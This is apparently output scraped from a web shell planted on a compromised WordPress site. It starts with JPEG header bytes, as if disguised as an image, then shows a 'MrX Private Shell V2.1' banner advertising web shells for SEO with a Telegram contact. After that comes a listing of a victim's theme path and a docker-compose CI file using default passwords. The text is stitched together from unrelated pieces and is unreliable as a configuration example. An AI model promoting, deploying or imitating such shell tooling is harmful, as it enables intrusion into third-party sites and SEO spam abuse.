����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
home/eliteafr/datapro/wp-content/themes/hestia/docker-compose.ci.yml 0000666 00000002347 15221025237 0021621 0 ustar 00 version: '3.3'
services:
mysql:
image: mysql:5.7
restart: always
environment:
MYSQL_ROOT_PASSWORD: wordpress
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
cli:
privileged: true
image: wordpress:cli
restart: always
volumes:
- wpcore:/var/www/html
- ./bin:/var/www/html/bin
- ~/.wp-content:/var/www/html/wp-content
- ./dist/hestia:/var/www/html/wp-content/themes/hestia
depends_on:
- mysql
- wordpress
environment:
- WORDPRESS_DB_NAME=wordpress
- WORDPRESS_DB_USER=root
- WORDPRESS_DB_PASSWORD=wordpress
- WORDPRESS_DB_ROOT_PASSWORD=wordpress
- WORDPRESS_DEBUG=1
wordpress:
privileged: true
ports:
- 8080:80
depends_on:
- mysql
image: wordpress:latest
volumes:
- wpcore:/var/www/html
- ./bin:/var/www/html/bin
- ~/.wp-content:/var/www/html/wp-content
- ./dist/hestia:/var/www/html/wp-content/themes/hestia
restart: always
environment:
- WORDPRESS_DB_NAME=wordpress
- WORDPRESS_DB_USER=root
- WORDPRESS_DB_PASSWORD=wordpress
- WORDPRESS_DB_ROOT_PASSWORD=wordpress
- WORDPRESS_DEBUG=1
volumes:
wpcore: